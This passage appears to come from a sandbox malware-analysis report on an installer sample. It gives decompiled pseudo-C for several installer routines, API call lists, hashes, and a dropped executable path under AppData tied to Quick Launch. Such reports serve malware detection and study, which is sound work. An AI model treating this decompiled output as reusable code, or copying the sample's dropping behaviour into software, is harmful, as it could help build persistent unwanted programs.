                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                            • String ID:
                            • API String ID: 2320649405-0
                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                            • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                            • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                            0x004026ec
                            0x004026ee
                            0x004026f1
                            0x004026f3
                            0x004026f6
                            0x004026fb
                            0x004026ff
                            0x00402702
                            0x00402705
                            0x00402c2a
                            0x00402c2d
                            0x0040270b
                            0x0040270b
                            0x00402712
                            0x00402714
                            0x00402714
                            0x0040271a
                            0x0040287e
                            0x0040287e
                            0x00402881
                            0x00402886
                            0x004015b6
                            0x0040292e
                            0x0040292e
                            0x00000000
                            0x00402720
                            0x00402721
                            0x0040272c
                            0x0040272f
                            0x0040273b
                            0x0040273f
                            0x004027d7
                            0x004027ef
                            0x004027ff
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00402745
                            0x00402745
                            0x00402748
                            0x00402749
                            0x0040274c
                            0x00402751
                            0x00402758
                            0x00402760
                            0x00000000
                            0x00402766
                            0x00402766
                            0x0040276b
                            0x00000000
                            0x00402771
                            0x00402771
                            0x00402779
                            0x0040277c
                            0x0040277f
                            0x0040283a
                            0x00402841
                            0x00402785
                            0x0040278b
                            0x00402797
                            0x00402801
                            0x00402801
                            0x00402799
                            0x00402799
                            0x0040279c
                            0x0040279e
                            0x0040279e
                            0x0040279e
                            0x004027a1
                            0x004027a6
                            0x004027a9
                            0x00000000
                            0x00000000
                            0x004027ab
                            0x004027ae
                            0x004027bc
                            0x004027c2
                            0x004027d0
                            0x00000000
                            0x004027d2
                            0x00000000
                            0x004027d2
                            0x00000000
                            0x004027d0
                            0x0040279e
                            0x00402804
                            0x00402807
                            0x00000000
                            0x00402809
                            0x0040280e
                            0x0040284f
                            0x00402871
                            0x00402878
                            0x0040285d
                            0x0040285d
                            0x00402860
                            0x00402863
                            0x00402866
                            0x00402866
                            0x00000000
                            0x00402817
                            0x00402817
                            0x0040281a
                            0x0040281d
                            0x00402823
                            0x00402827
                            0x0040282a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040282a
                            0x0040280e
                            0x00402807
                            0x0040277f
                            0x0040276b
                            0x00402760
                            0x00000000
                            0x0040282c
                            0x0040282c
                            0x0040282f
                            0x00402838
                            0x00000000
                            0x0040272f
                            0x0040271a
                            0x00402c33
                            0x00402c39

                            APIs
                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                              • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: File$Pointer$ByteCharMultiWide$Read
                            • String ID: 9
                            • API String ID: 163830602-2366072709
                            • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                            • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                            • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                            • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040559F Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                            0x004055a5
                            0x004055af
                            0x004055b4
                            0x004055ba
                            0x004055c5
                            0x004055c8
                            0x004055cb
                            0x004055d1
                            0x004055d1
                            0x004055d7
                            0x004055df
                            0x004055e2
                            0x004055ff
                            0x00405603
                            0x0040560c
                            0x0040560c
                            0x00405616
                            0x0040561f
                            0x0040562b
                            0x00405632
                            0x00405636
                            0x00405639
                            0x0040564c
                            0x0040565a
                            0x0040565a
                            0x0040565e
                            0x00405660
                            0x00405663
                            0x00000000
                            0x00405663
                            0x004055e4
                            0x004055ec
                            0x004055f4
                            0x004055fa
                            0x00000000
                            0x004055fa
                            0x004055f4
                            0x004055e2
                            0x0040566f

                            APIs
                            • lstrlenW.KERNEL32(0042C248,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                            • lstrlenW.KERNEL32(00403418,0042C248,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                            • lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                            • SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                              • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                            • String ID:
                            • API String ID: 1495540970-0
                            • Opcode ID: 61fc35634f83d303f4bb0fdf458391b4626c4708e393b35bd1b1a29fdfa46634
                            • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                            • Opcode Fuzzy Hash: 61fc35634f83d303f4bb0fdf458391b4626c4708e393b35bd1b1a29fdfa46634
                            • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                            0x004067c6
                            0x004067cf
                            0x004067e6
                            0x004067e6
                            0x004067ed
                            0x004067f9
                            0x004067f9
                            0x004067fc
                            0x004067ff
                            0x00406804
                            0x00406806
                            0x0040680f
                            0x00406813
                            0x00406830
                            0x00406838
                            0x00406838
                            0x0040683d
                            0x0040683f
                            0x00406842
                            0x00406847
                            0x00406848
                            0x0040684c
                            0x0040684c
                            0x0040684d
                            0x00406854
                            0x00406856
                            0x0040685d
                            0x00000000
                            0x00000000
                            0x00406865
                            0x0040686b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040686b
                            0x00406870

                            APIs
                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                            • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                            • CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                            • CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Char$Next$Prev
                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                            • API String ID: 589700163-4010320282
                            • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                            • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                            • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                            • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                            0x00404e62
                            0x00404e6f
                            0x00404e75
                            0x00404eb3
                            0x00404eb3
                            0x00404ec2
                            0x00404ec9
                            0x00000000
                            0x00404ecb
                            0x00404e77
                            0x00404e86
                            0x00404e8e
                            0x00404e91
                            0x00404ea3
                            0x00404ea9
                            0x00404eb0
                            0x00000000
                            0x00404eb0
                            0x00000000

                            APIs
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                            • GetMessagePos.USER32 ref: 00404E77
                            • ScreenToClient.USER32 ref: 00404E91
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Message$Send$ClientScreen
                            • String ID: f
                            • API String ID: 41195575-1993550816
                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                            • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                            • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x47ed1b
					_t11 =  *0x42aa24; // 0x47ed1f
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                            0x00402fa3
                            0x00402fb1
                            0x00402fb7
                            0x00402fb7
                            0x00402fc5
                            0x00402fc7
                            0x00402fcd
                            0x00402fd4
                            0x00402fd6
                            0x00402fd6
                            0x00402fec
                            0x00402ffc
                            0x0040300e
                            0x0040300e
                            0x00403016

                            APIs
                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                            • MulDiv.KERNEL32(0047ED1B,00000064,0047ED1F), ref: 00402FDC
                            • wsprintfW.USER32 ref: 00402FEC
                            • SetWindowTextW.USER32(?,?), ref: 00402FFC
                            • SetDlgItemTextW.USER32 ref: 0040300E
                            Strings
                            • verifying installer: %d%%, xrefs: 00402FE6
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Text$ItemTimerWindowwsprintf
                            • String ID: verifying installer: %d%%
                            • API String ID: 1451636040-82062127
                            • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                            • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                            • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                            • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E00402950(int __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                            0x00402950
                            0x00402952
                            0x00402957
                            0x0040295c
                            0x0040295f
                            0x00402969
                            0x0040296d
                            0x0040296d
                            0x00402973
                            0x00402980
                            0x00402988
                            0x0040298b
                            0x00402997
                            0x0040299a
                            0x004029a0
                            0x004029ae
                            0x004029b3
                            0x004029b7
                            0x004029ba
                            0x004029c3
                            0x004029cf
                            0x004029d3
                            0x004029d6
                            0x004029e0
                            0x004029ff
                            0x004029ec
                            0x004029f4
                            0x004029f7
                            0x004029fc
                            0x004029fc
                            0x00402a06
                            0x00402a06
                            0x00402a13
                            0x00402a19
                            0x00402a1f
                            0x00402a1f
                            0x004029b7
                            0x00402a33
                            0x00402a35
                            0x00402a35
                            0x00402a3f
                            0x00402a40
                            0x00402a44
                            0x00402a48
                            0x00402a4e
                            0x00402a4e
                            0x00402a55
                            0x004022f1
                            0x00402c2d
                            0x00402c39

                            APIs
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                            • GlobalFree.KERNEL32 ref: 00402A06
                            • GlobalFree.KERNEL32 ref: 00402A19
                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
